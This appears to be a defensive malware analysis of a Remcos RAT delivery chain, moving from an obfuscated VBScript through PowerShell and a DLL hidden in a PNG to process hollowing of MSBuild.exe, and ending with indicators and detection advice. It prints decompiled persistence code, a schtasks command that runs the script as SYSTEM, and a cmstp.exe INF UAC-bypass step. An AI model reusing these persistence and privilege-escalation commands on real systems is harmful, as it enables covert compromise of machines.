Remcos RAT Analysis: Multi-Stage Delivery Chain

The initial VBScript file exhibits an unusually large size due to repetitive padding - the same 10 lines repeated thousands of times. This serves dual purposes:

1. Legitimacy Appearance: Large file sizes can appear more legitimate to cursory inspection
2. Obfuscation Concealment: Hiding the actual malicious code within the padding

The padding consists of ASCII character codes that can be converted to their corresponding characters using standard ASCII tables.

The obfuscated payload reveals a repeating pattern: "⏳लბ⣿༑₫ᨑԿ🖲ᅫҌ⊣ሒȪ⟚"

This pattern is processed by the categorised(ByVal inputText) function, which removes the repeating character sequences to reveal the actual payload.

Rather than manually reverse-engineering the deobfuscation algorithm, I modified the script to output the deobfuscated content by replacing dozens = categorised(dozens) with WScript.Echo categorised(dozens) and executing it safely with cscript.exe.

The deobfuscated VBScript reveals a PowerShell command that requires two transformations:

1. Character Substitution: Replace '#' characters with 'A'
2. Base64 Decoding: Convert the resulting string from Base64 to plaintext

Instead of using external tools, I executed the PowerShell code after removing Invoke-Expression to safely observe the decoded payload.

The decoded PowerShell script downloads a PNG file from a remote server. Although the malicious server was taken down within 24 hours, I captured the payload during the active period and uploaded it to MalwareBazaar for research purposes.

The downloaded PNG file contains embedded data between <<BASE64_START>> and <<BASE64_END>> markers. After extraction and Base64 decoding, this reveals a .NET DLL file.

I modified the PowerShell code to save the extracted DLL using:

[System.IO.File]::WriteAllBytes("C:\dnlib_image.dll", $cleared)

Loading the extracted DLL in dnSpy reveals it as Microsoft.Win32.TaskScheduler, Version=1.1.0.0 with an embedded dnlib component for .NET manipulation.

The DLL includes VM detection functionality similar to Robson Felix's VMDetector. However, this particular sample only checks for "qemu" strings, making detection evasion relatively straightforward.

Note: Despite having VM detection capabilities, this specific malware instance doesn't actively use this functionality during execution.

The malicious code centers around the VAI function, which orchestrates the main payload execution:

Linguistic Analysis: Several variable names appear in Spanish, potentially indicating the malware author's language preference, though this isn't conclusive evidence.

The startup_onstart function implements persistence through file system operations:

if (flag12)
{
    bool flag13 = !File.Exists(Path.Combine(caminho, nomedoarquivo + \uE11C.\uE000(12567) + extençao));
    bool flag14 = flag13;
    if (flag14)
    {
        Process.Start(new ProcessStartInfo
        {
            WindowStyle = ProcessWindowStyle.Hidden,
            FileName = \uE11C.\uE000(12607), // "cmd.exe"
            Arguments = string.Concat(new string[]
            {
                \uE11C.\uE000(12599), // "/C copy *."
                extençao,             // "vbs"
                \uE11C.\uE000(12770), // " \""
                Path.Combine(caminho, nomedoarquivo), // @"C:\ProgramData" + "millipascals"
                \uE11C.\uE000(12567), // "."
                extençao,             // "vbs"
                \uE11C.\uE000(12282)  // "\""
            })
        }).WaitForExit();
    }
    Loader.ExecutarMetodoVAI(taskname, caminho, nomedoarquivo, extençao);
}

Translated Command: cmd.exe /C copy *.vbs "C:\ProgramData\millipascals.vbs"

This copies the VBScript to a persistent location for future execution.

The ExecutarMetodoVAI function loads an embedded resource ending with "UAC.dll":

string text = Array.Find<string>(Assembly.GetExecutingAssembly().GetManifestResourceNames(), 
    new Predicate<string>(Loader.<>c.<>9.\uE000));

byte[] array;
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(text))
{
    using (MemoryStream memoryStream = new MemoryStream())
    {
        manifestResourceStream.CopyTo(memoryStream);
        array = memoryStream.ToArray();
    }
}
Assembly assembly = Assembly.Load(array);

The UAC.dll implements a sophisticated UAC bypass using cmstp.exe:

Command Generation:

cmd.exe /c powershell -Command "schtasks /Create /TN 'blinkered' /TR 'wscript.exe C:\ProgramData\millipascals.vbs' /SC ONSTART /RL HIGHEST /RU SYSTEM /F"

INF File Template Abuse:

1. Creates a malicious INF file in the temporary directory
2. Modifies the REPLACE_COMMAND_LINE placeholder in the INF template
3. Executes C:\Windows\system32\cmstp.exe /au "<inf_file_path>"

This technique leverages Windows' trusted cmstp.exe binary to execute the malicious command with elevated privileges, bypassing UAC warnings.

The malware performs process injection using Microsoft Build Engine (MSBuild.exe) as the target process:

Injection Process:

1. Create new MSBuild.exe process in suspended state
2. Allocate memory space within the target process
3. Write malicious code starting at address 0x400000
4. Resume thread execution with modified entry point

I extracted the injected data segments and combined them to reconstruct the final executable:

copy /b to400000.bin+to401000.bin+to459000.bin+to472000.bin+to478000.bin+to47D000.bin combined.exe

The reconstructed file reveals a Microsoft Visual C++ 8 executable containing the core Remcos RAT functionality.

Critical function identified: FUN_0040e560(0x400000,0,pcVar7) - likely the main execution entry point containing RAT capabilities.

Primary C2 Servers:

• relentlesswicked.duckdns.org
• relentless.webredirect.org

Both servers were offline during analysis, preventing live C2 communication observation.

String analysis reveals comprehensive RAT functionality:

• Remote Access Trojan capabilities
• Keylogger functionality
• Information Stealer modules
• System Logger components

Dynamic API Resolution: Uses GetProcAddress to resolve function addresses at runtime, complicating static analysis

Process Hollowing: Injects into legitimate Windows processes (MSBuild.exe) to evade process-based detection

UAC Bypass: Leverages trusted Windows binaries for privilege escalation without user prompts

Multi-Stage Delivery: Complex delivery chain makes automated analysis challenging

File Paths:

• C:\ProgramData\millipascals.vbs

Network Indicators:

• relentlesswicked.duckdns.org
• relentless.webredirect.org

Scheduled Tasks:

• Task Name: blinkered
• Command: wscript.exe C:\ProgramData\millipascals.vbs

Behavioral Detection: Monitor for cmstp.exe execution with suspicious INF files

Network Monitoring: Block access to identified C2 domains

Process Monitoring: Detect unexpected MSBuild.exe processes with anomalous memory patterns